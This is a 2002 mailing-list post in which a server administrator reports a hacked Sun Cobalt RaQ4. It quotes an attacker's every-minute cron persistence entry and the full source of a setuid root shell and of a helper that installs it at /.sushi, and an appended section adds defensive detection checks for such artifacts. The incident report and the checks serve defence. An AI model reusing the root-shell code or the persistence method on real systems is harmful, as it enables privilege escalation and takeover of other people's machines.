[cobalt-users] RaQ4 Hack - apache NOT fixed! be aware
- Subject: [cobalt-users] RaQ4 Hack - apache NOT fixed! be aware
- From: "Robin Edgar - Tripany" <red@xxxxxxxxxxx>
- Date: Thu Sep 5 16:14:06 2002
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
Well, I tried to do this via Sun but they told me the guarantee was out, so
via this channel...
On a happy day I found that this message was being posted about once every
minute:
--------------
Date: Thu, 5 Sep 2002 15:45:01 +0200
From: root (Cron Daemon)
To: root
Subject: Cron <root@raq-042> if [ -x "/tmp/core/own" ] ; then "/tmp/core/own";
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
/bin/sh: -c: line 2: syntax error: unexpected end of file
---------------
Now it's not mine, so I was a bit surprised.
In /etc/cron.d I found the following file (core):
------------
*/1 * * * * root if [ -x "/tmp/core/own" ] ; then "/tmp/core/own";
fi
------------
And in /tmp/core I found this:
-------------
drwxr-xr-x 2 httpd root 1024 Aug 29 20:21 ./
drwxrwxrwt 5 root root 1024 Sep 6 00:49 ../
-rw-rw-rw- 1 httpd root 71 Aug 29 20:21 croncore
lrwxrwxrwx 1 httpd root 16 Sep 6 00:49 gmon.out -> /etc/cron.d/core
-rwxrwxrwx 1 httpd root 11912 Aug 29 20:21 own
-rwxrwxrwx 1 httpd root 12061 Aug 29 20:21 sushi
-rw-rw-rw- 1 httpd root 150 Aug 29 20:21 sushi.c
-rw-rw-rw- 1 httpd root 90 Aug 29 20:21 takeover.c
-------------------
sushi.c
----------------
#include <unistd.h>
/* Privilege-escalation shell: only effective when this binary is itself
   setuid root, which is what takeover.c arranges with chmod 6777. */
int main (int argc, char **argv, char **envp) {
setuid(0);   /* become root (works because the binary is setuid root) */
setgid(0);
execve("/bin/sh",argv,envp);   /* replace this process with a root shell */
return -1;   /* only reached if execve fails */
}
-------------------
and takeover.c
------------------
#include <stdlib.h>
/* Copies the shell above to a hidden path and makes it setuid/setgid root (6777). */
int main(void) { system("cp /tmp/core/sushi /.sushi ; chmod 6777 /.sushi"); return 0; }
-------------------
Doing straces on the binaries, I found that the 2 binaries are the compiled
files above.
Doing some more digging, I found:
/tmp/.tmp/
drwxr-xr-x 2 httpd root 1024 Aug 29 20:06 ./
drwxrwxrwt 5 root root 1024 Sep 6 00:49 ../
-rwxr-xr-x 1 httpd root 14277 Aug 29 01:28 backlyn
-rw-r--r-- 1 httpd root 1283 Aug 29 01:27 backlyn.c
-rwxr-xr-x 1 httpd root 14278 Aug 29 01:28 backwget
-rw-r--r-- 1 httpd root 1283 Aug 29 01:27 backwget.c
-rwxr-xr-x 1 httpd root 14677 Aug 29 01:31 epcs
-rw-r--r-- 1 httpd root 5073 May 14 2001 epcs2.c
-rw-r--r-- 1 httpd root 2916 Aug 29 20:20 raq4lrex.sh
-rwxr-xr-x 1 httpd root 28449 Aug 29 01:36 red
-rw-r--r-- 1 httpd root 12891 Jun 5 2001 red.c
Now the sources of these are too long to post, so you can get them from me.
Suffice to say, yes it /does/ launch a shell, and also runs raq4lrex.sh as a
daemon.
I haven't figured out how they managed to get the files to /tmp but I know
this is tailored for the RaQ4 (in the sources of one of the above).
Sun refuses to help (thank you oh so much sun), so maybe you can figure it
out. And before you ask, YES, I had fully patched up the machine.
Looks to me like they broke apache, so the 'fix' doesn't really work.
If you want the sources for further examination, please email me, and I'll
send them to you.
Best regards
Robin Edgar
Tripany
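Two triage checks for the persistence Robin describes (a /etc/cron.d entry that executes out of /tmp, and a setuid/setgid shell dropped at /.sushi), added here as an example and not code from the original post or from Sun/Cobalt. The directory arguments, the sample tree and the stand-in .sushi file are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original post.  Two triage checks for the
# artifacts described above: a cron.d entry that runs something out of
# /tmp, and a setuid/setgid file in a hidden path.  Directories are
# parameters so the checks can run against a constructed sample tree;
# on a real host pass /etc/cron.d and / (and add -user root to the find).

# Print "file:line:entry" for every non-comment cron.d line whose
# command references a world-writable staging directory.
find_tmp_cron_entries() {
    grep -n -H -E '^[^#].*(/tmp/|/var/tmp/)' "$1"/* 2>/dev/null
}

# Print every regular file under a tree with the setuid or setgid bit set.
find_setuid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Build a constructed sample tree mirroring the artifacts in the post
# (the cron entry is the one quoted there; .sushi is a harmless stand-in).
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/cron.d" "$root/tmp/core"
    printf '%s\n' '*/1 * * * * root if [ -x "/tmp/core/own" ] ; then "/tmp/core/own";' 'fi' \
        > "$root/etc/cron.d/core"
    # Benign entry that must not be flagged.
    printf '%s\n' '# sysstat' '0 * * * * root /usr/lib/sa/sa1' > "$root/etc/cron.d/sysstat"
    printf '%s\n' '#!/bin/sh' 'exec /bin/sh "$@"' > "$root/.sushi"
    chmod 6777 "$root/.sushi"
    echo "$root"
}

# Demonstration on the sample tree; remove this part to use on a real host.
sample=$(build_sample_tree)
echo "cron.d entries executing from /tmp:"
find_tmp_cron_entries "$sample/etc/cron.d"
echo "setuid/setgid files:"
find_setuid_files "$sample"
rm -rf "$sample"
```

On a real RaQ the listing from the first check should be empty; anything it prints, and any setuid file outside the package-owned paths, is worth the same scrutiny Robin gave /tmp/core.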